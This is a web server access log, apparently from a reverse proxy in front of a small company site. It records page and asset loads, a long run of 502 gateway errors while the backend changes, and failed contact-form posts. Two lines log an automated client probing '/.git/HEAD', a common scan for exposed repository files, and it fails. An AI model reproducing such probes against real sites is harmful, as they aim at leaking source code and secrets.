[14/Feb/2026:22:53:23 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[14/Feb/2026:22:55:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 8254] [Gzip 5.32] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[14/Feb/2026:22:55:21 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[14/Feb/2026:22:55:21 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[14/Feb/2026:22:55:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4668] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[14/Feb/2026:22:55:21 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 189] [Gzip 3.12] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[14/Feb/2026:22:57:01 +0000] - - 301 - GET http www.hanmocnn.co.kr "/" [Client 91.231.89.122] [Length 166] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-"
|
||||||
|
[14/Feb/2026:22:59:10 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/" [Client 91.231.89.123] [Length 154] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-"
|
||||||
|
[14/Feb/2026:23:04:30 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/" [Client 91.196.152.153] [Length 154] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-"
|
||||||
|
[14/Feb/2026:23:04:34 +0000] - - 301 - GET http www.hanmocnn.co.kr "/favicon.ico" [Client 91.196.152.226] [Length 166] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-"
|
||||||
|
[14/Feb/2026:23:09:54 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/" [Client 35.204.135.22] [Length 154] [Gzip -] [Sent-to hanmo-home] "Scrapy/2.13.4 (+https://scrapy.org)" "-"
|
||||||
|
[14/Feb/2026:23:45:26 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/" [Client 94.247.172.129] [Length 154] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2)" "-"
|
||||||
|
[14/Feb/2026:23:51:03 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[14/Feb/2026:23:51:15 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[14/Feb/2026:23:51:31 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[14/Feb/2026:23:51:33 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[14/Feb/2026:23:51:38 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[14/Feb/2026:23:52:14 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[14/Feb/2026:23:56:38 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[14/Feb/2026:23:56:43 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[14/Feb/2026:23:56:51 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[14/Feb/2026:23:57:26 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[14/Feb/2026:23:57:49 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[14/Feb/2026:23:59:06 +0000] - 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[14/Feb/2026:23:59:08 +0000] - 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[14/Feb/2026:23:59:12 +0000] - 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[14/Feb/2026:23:59:42 +0000] - 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[14/Feb/2026:23:59:46 +0000] - 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:00:02:19 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:00:02:52 +0000] - 502, 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to hanmo-home] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:00:03:33 +0000] - 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:00:03:40 +0000] - 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:00:04:37 +0000] - 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to www.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:00:04:49 +0000] - 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to www.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:00:05:16 +0000] - 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to www.hanmocnn.co.kr] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:00:08:04 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 8241] [Gzip 5.32] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:00:08:04 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:00:08:04 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:00:08:04 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:00:09:29 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:00:09:30 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:00:10:21 +0000] - 502 502 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:00:10:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 8241] [Gzip 5.32] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:00:11:08 +0000] - 422 422 - POST https www.hanmocnn.co.kr "/api/contact" [Client 222.117.41.51] [Length 215] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:00:11:18 +0000] - 422 422 - POST https www.hanmocnn.co.kr "/api/contact" [Client 222.117.41.51] [Length 215] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:00:49:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 8300] [Gzip 5.30] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:00:49:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5053] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:00:53:20 +0000] - - 301 - GET http www.hanmocnn.co.kr "/.git/HEAD" [Client 185.137.164.13] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Python-urllib/3.10" "-"
|
||||||
|
[15/Feb/2026:00:53:21 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.git/HEAD" [Client 185.137.164.18] [Length 153] [Gzip -] [Sent-to 192.168.0.250] "Python-urllib/3.10" "-"
|
||||||
|
[15/Feb/2026:00:53:59 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 8300] [Gzip 5.30] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:00:53:59 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1060] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:00:53:59 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:00:53:59 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5055] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:00:54:00 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:03:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 8968] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:01:03:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:03:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:03:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17289] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:03:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:03:58 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:05:52 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:01:05:52 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:05:52 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:05:52 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:06:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 8968] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:01:06:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:06:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:06:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17289] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:06:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:07:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 8968] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:01:07:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:07:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:07:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17271] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:07:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:08:52 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 8968] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:01:08:52 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:08:52 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:08:52 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 17271] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:08:52 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:10:14 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 8968] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:01:10:14 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:10:14 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/"
|
||||||
|
